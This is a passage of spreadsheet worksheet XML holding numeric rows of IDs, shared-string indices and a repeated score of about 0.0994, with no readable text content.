      <c r="C18893" s="2" t="s">
        <v>18208</v>
      </c>
      <c r="D18893" s="2">
        <v>1.0</v>
      </c>
      <c r="E18893" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18893" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18894" ht="15.75" customHeight="1">
      <c r="A18894" s="1">
        <v>23335.0</v>
      </c>
      <c r="B18894" s="2">
        <v>5.4686225E7</v>
      </c>
      <c r="C18894" s="2" t="s">
        <v>18209</v>
      </c>
      <c r="D18894" s="2">
        <v>1.0</v>
      </c>
      <c r="E18894" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18894" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18895" ht="15.75" customHeight="1">
      <c r="A18895" s="1">
        <v>23374.0</v>
      </c>
      <c r="B18895" s="2">
        <v>5542688.0</v>
      </c>
      <c r="C18895" s="2" t="s">
        <v>18210</v>
      </c>
      <c r="D18895" s="2">
        <v>1.0</v>
      </c>
      <c r="E18895" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18895" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18896" ht="15.75" customHeight="1">
      <c r="A18896" s="1">
        <v>23682.0</v>
      </c>
      <c r="B18896" s="2">
        <v>6982750.0</v>
      </c>
      <c r="C18896" s="2" t="s">
        <v>18211</v>
      </c>
      <c r="D18896" s="2">
        <v>1.0</v>
      </c>
      <c r="E18896" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18896" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18897" ht="15.75" customHeight="1">
      <c r="A18897" s="1">
        <v>23688.0</v>
      </c>
      <c r="B18897" s="2">
        <v>7006427.0</v>
      </c>
      <c r="C18897" s="2" t="s">
        <v>18208</v>
      </c>
      <c r="D18897" s="2">
        <v>1.0</v>
      </c>
      <c r="E18897" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18897" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18898" ht="15.75" customHeight="1">
      <c r="A18898" s="1">
        <v>23969.0</v>
      </c>
      <c r="B18898" s="2">
        <v>9050850.0</v>
      </c>
      <c r="C18898" s="2" t="s">
        <v>18212</v>
      </c>
      <c r="D18898" s="2">
        <v>1.0</v>
      </c>
      <c r="E18898" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18898" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18899" ht="15.75" customHeight="1">
      <c r="A18899" s="1">
        <v>24022.0</v>
      </c>
      <c r="B18899" s="2">
        <v>9352899.0</v>
      </c>
      <c r="C18899" s="2" t="s">
        <v>18213</v>
      </c>
      <c r="D18899" s="2">
        <v>1.0</v>
      </c>
      <c r="E18899" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18899" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18900" ht="15.75" customHeight="1">
      <c r="A18900" s="1">
        <v>24030.0</v>
      </c>
      <c r="B18900" s="2">
        <v>9431371.0</v>
      </c>
      <c r="C18900" s="2" t="s">
        <v>18214</v>
      </c>
      <c r="D18900" s="2">
        <v>1.0</v>
      </c>
      <c r="E18900" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18900" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18901" ht="15.75" customHeight="1">
      <c r="A18901" s="1">
        <v>24628.0</v>
      </c>
      <c r="B18901" s="2">
        <v>1.1470566E7</v>
      </c>
      <c r="C18901" s="2" t="s">
        <v>18215</v>
      </c>
      <c r="D18901" s="2">
        <v>1.0</v>
      </c>
      <c r="E18901" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18901" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18902" ht="15.75" customHeight="1">
      <c r="A18902" s="1">
        <v>24865.0</v>
      </c>
      <c r="B18902" s="2">
        <v>1.2208325E7</v>
      </c>
      <c r="C18902" s="2" t="s">
        <v>18216</v>
      </c>
      <c r="D18902" s="2">
        <v>1.0</v>
      </c>
      <c r="E18902" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18902" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18903" ht="15.75" customHeight="1">
      <c r="A18903" s="1">
        <v>24885.0</v>
      </c>
      <c r="B18903" s="2">
        <v>1.2241041E7</v>
      </c>
      <c r="C18903" s="2" t="s">
        <v>2204</v>
      </c>
      <c r="D18903" s="2">
        <v>1.0</v>
      </c>
      <c r="E18903" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18903" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18904" ht="15.75" customHeight="1">
      <c r="A18904" s="1">
        <v>24919.0</v>
      </c>
      <c r="B18904" s="2">
        <v>1.2370333E7</v>
      </c>
      <c r="C18904" s="2" t="s">
        <v>18217</v>
      </c>
      <c r="D18904" s="2">
        <v>1.0</v>
      </c>
      <c r="E18904" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18904" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18905" ht="15.75" customHeight="1">
      <c r="A18905" s="1">
        <v>24942.0</v>
      </c>
      <c r="B18905" s="2">
        <v>1.2498851E7</v>
      </c>
      <c r="C18905" s="2" t="s">
        <v>18190</v>
      </c>
      <c r="D18905" s="2">
        <v>1.0</v>
      </c>
      <c r="E18905" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18905" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18906" ht="15.75" customHeight="1">
      <c r="A18906" s="1">
        <v>25062.0</v>
      </c>
      <c r="B18906" s="2">
        <v>1.2871449E7</v>
      </c>
      <c r="C18906" s="2" t="s">
        <v>18218</v>
      </c>
      <c r="D18906" s="2">
        <v>1.0</v>
      </c>
      <c r="E18906" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18906" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18907" ht="15.75" customHeight="1">
      <c r="A18907" s="1">
        <v>25122.0</v>
      </c>
      <c r="B18907" s="2">
        <v>1.2972286E7</v>
      </c>
      <c r="C18907" s="2" t="s">
        <v>18219</v>
      </c>
      <c r="D18907" s="2">
        <v>1.0</v>
      </c>
      <c r="E18907" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18907" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18908" ht="15.75" customHeight="1">
      <c r="A18908" s="1">
        <v>25195.0</v>
      </c>
      <c r="B18908" s="2">
        <v>1.3198648E7</v>
      </c>
      <c r="C18908" s="2" t="s">
        <v>18194</v>
      </c>
      <c r="D18908" s="2">
        <v>1.0</v>
      </c>
      <c r="E18908" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18908" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18909" ht="15.75" customHeight="1">
      <c r="A18909" s="1">
        <v>25506.0</v>
      </c>
      <c r="B18909" s="2">
        <v>1.4143796E7</v>
      </c>
      <c r="C18909" s="2" t="s">
        <v>18220</v>
      </c>
      <c r="D18909" s="2">
        <v>1.0</v>
      </c>
      <c r="E18909" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18909" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18910" ht="15.75" customHeight="1">
      <c r="A18910" s="1">
        <v>25870.0</v>
      </c>
      <c r="B18910" s="2">
        <v>1.4903974E7</v>
      </c>
      <c r="C18910" s="2" t="s">
        <v>18221</v>
      </c>
      <c r="D18910" s="2">
        <v>1.0</v>
      </c>
      <c r="E18910" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18910" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18911" ht="15.75" customHeight="1">
      <c r="A18911" s="1">
        <v>26847.0</v>
      </c>
      <c r="B18911" s="2">
        <v>1.9009347E7</v>
      </c>
      <c r="C18911" s="2" t="s">
        <v>18222</v>
      </c>
      <c r="D18911" s="2">
        <v>1.0</v>
      </c>
      <c r="E18911" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18911" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18912" ht="15.75" customHeight="1">
      <c r="A18912" s="1">
        <v>27621.0</v>
      </c>
      <c r="B18912" s="2">
        <v>2.2686181E7</v>
      </c>
      <c r="C18912" s="2" t="s">
        <v>18223</v>
      </c>
      <c r="D18912" s="2">
        <v>1.0</v>
      </c>
      <c r="E18912" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18912" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18913" ht="15.75" customHeight="1">
      <c r="A18913" s="1">
        <v>27884.0</v>
      </c>
      <c r="B18913" s="2">
        <v>2.3576554E7</v>
      </c>
      <c r="C18913" s="2" t="s">
        <v>18198</v>
      </c>
      <c r="D18913" s="2">
        <v>1.0</v>
      </c>
      <c r="E18913" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18913" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18914" ht="15.75" customHeight="1">
      <c r="A18914" s="1">
        <v>28034.0</v>
      </c>
      <c r="B18914" s="2">
        <v>2.4455083E7</v>
      </c>
      <c r="C18914" s="2" t="s">
        <v>18224</v>
      </c>
      <c r="D18914" s="2">
        <v>1.0</v>
      </c>
      <c r="E18914" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18914" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18915" ht="15.75" customHeight="1">
      <c r="A18915" s="1">
        <v>28150.0</v>
      </c>
      <c r="B18915" s="2">
        <v>2.4826089E7</v>
      </c>
      <c r="C18915" s="2" t="s">
        <v>18225</v>
      </c>
      <c r="D18915" s="2">
        <v>1.0</v>
      </c>
      <c r="E18915" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18915" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18916" ht="15.75" customHeight="1">
      <c r="A18916" s="1">
        <v>28161.0</v>
      </c>
      <c r="B18916" s="2">
        <v>2.4899338E7</v>
      </c>
      <c r="C18916" s="2" t="s">
        <v>18226</v>
      </c>
      <c r="D18916" s="2">
        <v>1.0</v>
      </c>
      <c r="E18916" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18916" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18917" ht="15.75" customHeight="1">
      <c r="A18917" s="1">
        <v>28210.0</v>
      </c>
      <c r="B18917" s="2">
        <v>2.5045699E7</v>
      </c>
      <c r="C18917" s="2" t="s">
        <v>18227</v>
      </c>
      <c r="D18917" s="2">
        <v>1.0</v>
      </c>
      <c r="E18917" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18917" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18918" ht="15.75" customHeight="1">
      <c r="A18918" s="1">
        <v>29465.0</v>
      </c>
      <c r="B18918" s="2">
        <v>3.2333539E7</v>
      </c>
      <c r="C18918" s="2" t="s">
        <v>18228</v>
      </c>
      <c r="D18918" s="2">
        <v>1.0</v>
      </c>
      <c r="E18918" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18918" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18919" ht="15.75" customHeight="1">
      <c r="A18919" s="1">
        <v>29532.0</v>
      </c>
      <c r="B18919" s="2">
        <v>3.282336E7</v>
      </c>
      <c r="C18919" s="2" t="s">
        <v>18229</v>
      </c>
      <c r="D18919" s="2">
        <v>1.0</v>
      </c>
      <c r="E18919" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18919" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18920" ht="15.75" customHeight="1">
      <c r="A18920" s="1">
        <v>29800.0</v>
      </c>
      <c r="B18920" s="2">
        <v>3.5113688E7</v>
      </c>
      <c r="C18920" s="2" t="s">
        <v>18230</v>
      </c>
      <c r="D18920" s="2">
        <v>1.0</v>
      </c>
      <c r="E18920" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18920" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18921" ht="15.75" customHeight="1">
      <c r="A18921" s="1">
        <v>30063.0</v>
      </c>
      <c r="B18921" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C18921" s="2" t="s">
        <v>18231</v>
      </c>
      <c r="D18921" s="2">
        <v>1.0</v>
      </c>
      <c r="E18921" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18921" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18922" ht="15.75" customHeight="1">
      <c r="A18922" s="1">
        <v>30519.0</v>
      </c>
      <c r="B18922" s="2">
        <v>4.0152019E7</v>
      </c>
      <c r="C18922" s="2" t="s">
        <v>18232</v>
      </c>
      <c r="D18922" s="2">
        <v>1.0</v>
      </c>
      <c r="E18922" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18922" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18923" ht="15.75" customHeight="1">
      <c r="A18923" s="1">
        <v>31249.0</v>
      </c>
      <c r="B18923" s="2">
        <v>4933607.0</v>
      </c>
      <c r="C18923" s="2" t="s">
        <v>18233</v>
      </c>
      <c r="D18923" s="2">
        <v>1.0</v>
      </c>
      <c r="E18923" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18923" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18924" ht="15.75" customHeight="1">
      <c r="A18924" s="1">
        <v>31386.0</v>
      </c>
      <c r="B18924" s="2">
        <v>4998248.0</v>
      </c>
      <c r="C18924" s="2" t="s">
        <v>18234</v>
      </c>
      <c r="D18924" s="2">
        <v>1.0</v>
      </c>
      <c r="E18924" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18924" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18925" ht="15.75" customHeight="1">
      <c r="A18925" s="1">
        <v>31415.0</v>
      </c>
      <c r="B18925" s="2">
        <v>5.0091286E7</v>
      </c>
      <c r="C18925" s="2" t="s">
        <v>18235</v>
      </c>
      <c r="D18925" s="2">
        <v>1.0</v>
      </c>
      <c r="E18925" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18925" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18926" ht="15.75" customHeight="1">
      <c r="A18926" s="1">
        <v>31416.0</v>
      </c>
      <c r="B18926" s="2">
        <v>5.0091286E7</v>
      </c>
      <c r="C18926" s="2" t="s">
        <v>18236</v>
      </c>
      <c r="D18926" s="2">
        <v>1.0</v>
      </c>
      <c r="E18926" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18926" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18927" ht="15.75" customHeight="1">
      <c r="A18927" s="1">
        <v>31581.0</v>
      </c>
      <c r="B18927" s="2">
        <v>5126925.0</v>
      </c>
      <c r="C18927" s="2" t="s">
        <v>18237</v>
      </c>
      <c r="D18927" s="2">
        <v>1.0</v>
      </c>
      <c r="E18927" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18927" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18928" ht="15.75" customHeight="1">
      <c r="A18928" s="1">
        <v>31598.0</v>
      </c>
      <c r="B18928" s="2">
        <v>5132963.0</v>
      </c>
      <c r="C18928" s="2" t="s">
        <v>18238</v>
      </c>
      <c r="D18928" s="2">
        <v>1.0</v>
      </c>
      <c r="E18928" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18928" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18929" ht="15.75" customHeight="1">
      <c r="A18929" s="1">
        <v>31680.0</v>
      </c>
      <c r="B18929" s="2">
        <v>5187701.0</v>
      </c>
      <c r="C18929" s="2" t="s">
        <v>18239</v>
      </c>
      <c r="D18929" s="2">
        <v>1.0</v>
      </c>
      <c r="E18929" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18929" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18930" ht="15.75" customHeight="1">
      <c r="A18930" s="1">
        <v>31739.0</v>
      </c>
      <c r="B18930" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C18930" s="2" t="s">
        <v>18240</v>
      </c>
      <c r="D18930" s="2">
        <v>1.0</v>
      </c>
      <c r="E18930" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18930" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18931" ht="15.75" customHeight="1">
      <c r="A18931" s="1">
        <v>32400.0</v>
      </c>
      <c r="B18931" s="2">
        <v>5627572.0</v>
      </c>
      <c r="C18931" s="2" t="s">
        <v>18241</v>
      </c>
      <c r="D18931" s="2">
        <v>1.0</v>
      </c>
      <c r="E18931" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18931" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18932" ht="15.75" customHeight="1">
      <c r="A18932" s="1">
        <v>32559.0</v>
      </c>
      <c r="B18932" s="2">
        <v>5760257.0</v>
      </c>
      <c r="C18932" s="2" t="s">
        <v>18242</v>
      </c>
      <c r="D18932" s="2">
        <v>1.0</v>
      </c>
      <c r="E18932" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18932" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18933" ht="15.75" customHeight="1">
      <c r="A18933" s="1">
        <v>32811.0</v>
      </c>
      <c r="B18933" s="2">
        <v>6184377.0</v>
      </c>
      <c r="C18933" s="2" t="s">
        <v>18243</v>
      </c>
      <c r="D18933" s="2">
        <v>1.0</v>
      </c>
      <c r="E18933" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18933" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18934" ht="15.75" customHeight="1">
      <c r="A18934" s="1">
        <v>33095.0</v>
      </c>
      <c r="B18934" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C18934" s="2" t="s">
        <v>18244</v>
      </c>
      <c r="D18934" s="2">
        <v>1.0</v>
      </c>
      <c r="E18934" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18934" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18935" ht="15.75" customHeight="1">
      <c r="A18935" s="1">
        <v>33441.0</v>
      </c>
      <c r="B18935" s="2">
        <v>7846151.0</v>
      </c>
      <c r="C18935" s="2" t="s">
        <v>18245</v>
      </c>
      <c r="D18935" s="2">
        <v>1.0</v>
      </c>
      <c r="E18935" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18935" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18936" ht="15.75" customHeight="1">
      <c r="A18936" s="1">
        <v>33520.0</v>
      </c>
      <c r="B18936" s="2">
        <v>8094304.0</v>
      </c>
      <c r="C18936" s="2" t="s">
        <v>18246</v>
      </c>
      <c r="D18936" s="2">
        <v>1.0</v>
      </c>
      <c r="E18936" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18936" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18937" ht="15.75" customHeight="1">
      <c r="A18937" s="1">
        <v>33836.0</v>
      </c>
      <c r="B18937" s="2">
        <v>8999154.0</v>
      </c>
      <c r="C18937" s="2" t="s">
        <v>18247</v>
      </c>
      <c r="D18937" s="2">
        <v>1.0</v>
      </c>
      <c r="E18937" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18937" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18938" ht="15.75" customHeight="1">
      <c r="A18938" s="1">
        <v>151.0</v>
      </c>
      <c r="B18938" s="2">
        <v>1.3671915E7</v>
      </c>
      <c r="C18938" s="2" t="s">
        <v>18248</v>
      </c>
      <c r="D18938" s="2">
        <v>1.0</v>
      </c>
      <c r="E18938" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18938" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18939" ht="15.75" customHeight="1">
      <c r="A18939" s="1">
        <v>394.0</v>
      </c>
      <c r="B18939" s="2">
        <v>1.6526466E7</v>
      </c>
      <c r="C18939" s="2" t="s">
        <v>18249</v>
      </c>
      <c r="D18939" s="2">
        <v>1.0</v>
      </c>
      <c r="E18939" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18939" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18940" ht="15.75" customHeight="1">
      <c r="A18940" s="1">
        <v>1162.0</v>
      </c>
      <c r="B18940" s="2">
        <v>2.4501974E7</v>
      </c>
      <c r="C18940" s="2" t="s">
        <v>18250</v>
      </c>
      <c r="D18940" s="2">
        <v>1.0</v>
      </c>
      <c r="E18940" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18940" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18941" ht="15.75" customHeight="1">
      <c r="A18941" s="1">
        <v>1540.0</v>
      </c>
      <c r="B18941" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C18941" s="2" t="s">
        <v>18251</v>
      </c>
      <c r="D18941" s="2">
        <v>1.0</v>
      </c>
      <c r="E18941" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18941" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18942" ht="15.75" customHeight="1">
      <c r="A18942" s="1">
        <v>1583.0</v>
      </c>
      <c r="B18942" s="2">
        <v>2.7730877E7</v>
      </c>
      <c r="C18942" s="2" t="s">
        <v>18252</v>
      </c>
      <c r="D18942" s="2">
        <v>1.0</v>
      </c>
      <c r="E18942" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18942" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18943" ht="15.75" customHeight="1">
      <c r="A18943" s="1">
        <v>1789.0</v>
      </c>
      <c r="B18943" s="2">
        <v>2.9100297E7</v>
      </c>
      <c r="C18943" s="2" t="s">
        <v>18253</v>
      </c>
      <c r="D18943" s="2">
        <v>1.0</v>
      </c>
      <c r="E18943" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18943" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18944" ht="15.75" customHeight="1">
      <c r="A18944" s="1">
        <v>2395.0</v>
      </c>
      <c r="B18944" s="2">
        <v>3338285.0</v>
      </c>
      <c r="C18944" s="2" t="s">
        <v>18254</v>
      </c>
      <c r="D18944" s="2">
        <v>1.0</v>
      </c>
      <c r="E18944" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18944" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18945" ht="15.75" customHeight="1">
      <c r="A18945" s="1">
        <v>2446.0</v>
      </c>
      <c r="B18945" s="2">
        <v>3.3705038E7</v>
      </c>
      <c r="C18945" s="2" t="s">
        <v>18255</v>
      </c>
      <c r="D18945" s="2">
        <v>1.0</v>
      </c>
      <c r="E18945" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18945" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18946" ht="15.75" customHeight="1">
      <c r="A18946" s="1">
        <v>2614.0</v>
      </c>
      <c r="B18946" s="2">
        <v>3.4472335E7</v>
      </c>
      <c r="C18946" s="2" t="s">
        <v>18256</v>
      </c>
      <c r="D18946" s="2">
        <v>1.0</v>
      </c>
      <c r="E18946" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18946" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18947" ht="15.75" customHeight="1">
      <c r="A18947" s="1">
        <v>2736.0</v>
      </c>
      <c r="B18947" s="2">
        <v>3.5002762E7</v>
      </c>
      <c r="C18947" s="2" t="s">
        <v>18257</v>
      </c>
      <c r="D18947" s="2">
        <v>1.0</v>
      </c>
      <c r="E18947" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18947" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18948" ht="15.75" customHeight="1">
      <c r="A18948" s="1">
        <v>3049.0</v>
      </c>
      <c r="B18948" s="2">
        <v>3.6506077E7</v>
      </c>
      <c r="C18948" s="2" t="s">
        <v>18258</v>
      </c>
      <c r="D18948" s="2">
        <v>1.0</v>
      </c>
      <c r="E18948" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18948" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18949" ht="15.75" customHeight="1">
      <c r="A18949" s="1">
        <v>3141.0</v>
      </c>
      <c r="B18949" s="2">
        <v>3.6919207E7</v>
      </c>
      <c r="C18949" s="2" t="s">
        <v>18259</v>
      </c>
      <c r="D18949" s="2">
        <v>1.0</v>
      </c>
      <c r="E18949" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18949" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18950" ht="15.75" customHeight="1">
      <c r="A18950" s="1">
        <v>3177.0</v>
      </c>
      <c r="B18950" s="2">
        <v>3.7098019E7</v>
      </c>
      <c r="C18950" s="2" t="s">
        <v>18260</v>
      </c>
      <c r="D18950" s="2">
        <v>1.0</v>
      </c>
      <c r="E18950" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18950" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18951" ht="15.75" customHeight="1">
      <c r="A18951" s="1">
        <v>3203.0</v>
      </c>
      <c r="B18951" s="2">
        <v>3.7256234E7</v>
      </c>
      <c r="C18951" s="2" t="s">
        <v>18261</v>
      </c>
      <c r="D18951" s="2">
        <v>1.0</v>
      </c>
      <c r="E18951" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18951" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18952" ht="15.75" customHeight="1">
      <c r="A18952" s="1">
        <v>3401.0</v>
      </c>
      <c r="B18952" s="2">
        <v>3.802833E7</v>
      </c>
      <c r="C18952" s="2" t="s">
        <v>18262</v>
      </c>
      <c r="D18952" s="2">
        <v>1.0</v>
      </c>
      <c r="E18952" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18952" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18953" ht="15.75" customHeight="1">
      <c r="A18953" s="1">
        <v>3621.0</v>
      </c>
      <c r="B18953" s="2">
        <v>3.9189065E7</v>
      </c>
      <c r="C18953" s="2" t="s">
        <v>18263</v>
      </c>
      <c r="D18953" s="2">
        <v>1.0</v>
      </c>
      <c r="E18953" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18953" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18954" ht="15.75" customHeight="1">
      <c r="A18954" s="1">
        <v>3707.0</v>
      </c>
      <c r="B18954" s="2">
        <v>3.9591561E7</v>
      </c>
      <c r="C18954" s="2" t="s">
        <v>18264</v>
      </c>
      <c r="D18954" s="2">
        <v>1.0</v>
      </c>
      <c r="E18954" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18954" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18955" ht="15.75" customHeight="1">
      <c r="A18955" s="1">
        <v>4103.0</v>
      </c>
      <c r="B18955" s="2">
        <v>4.1333727E7</v>
      </c>
      <c r="C18955" s="2" t="s">
        <v>18265</v>
      </c>
      <c r="D18955" s="2">
        <v>1.0</v>
      </c>
      <c r="E18955" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18955" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18956" ht="15.75" customHeight="1">
      <c r="A18956" s="1">
        <v>4153.0</v>
      </c>
      <c r="B18956" s="2">
        <v>4.1442266E7</v>
      </c>
      <c r="C18956" s="2" t="s">
        <v>18266</v>
      </c>
      <c r="D18956" s="2">
        <v>1.0</v>
      </c>
      <c r="E18956" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18956" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18957" ht="15.75" customHeight="1">
      <c r="A18957" s="1">
        <v>4221.0</v>
      </c>
      <c r="B18957" s="2">
        <v>4.1731108E7</v>
      </c>
      <c r="C18957" s="2" t="s">
        <v>18267</v>
      </c>
      <c r="D18957" s="2">
        <v>1.0</v>
      </c>
      <c r="E18957" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18957" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18958" ht="15.75" customHeight="1">
      <c r="A18958" s="1">
        <v>4298.0</v>
      </c>
      <c r="B18958" s="2">
        <v>4.1925515E7</v>
      </c>
      <c r="C18958" s="2" t="s">
        <v>18268</v>
      </c>
      <c r="D18958" s="2">
        <v>1.0</v>
      </c>
      <c r="E18958" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18958" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18959" ht="15.75" customHeight="1">
      <c r="A18959" s="1">
        <v>4441.0</v>
      </c>
      <c r="B18959" s="2">
        <v>4237148.0</v>
      </c>
      <c r="C18959" s="2" t="s">
        <v>18269</v>
      </c>
      <c r="D18959" s="2">
        <v>1.0</v>
      </c>
      <c r="E18959" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18959" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="18960" ht="15.75" customHeight="1">
      <c r="A18960" s="1">
        <v>4499.0</v>
      </c>
      <c r="B18960" s="2">
        <v>4.2563623E7</v>
      </c>
      <c r="C18960" s="2" t="s">
        <v>18270</v>
      </c>
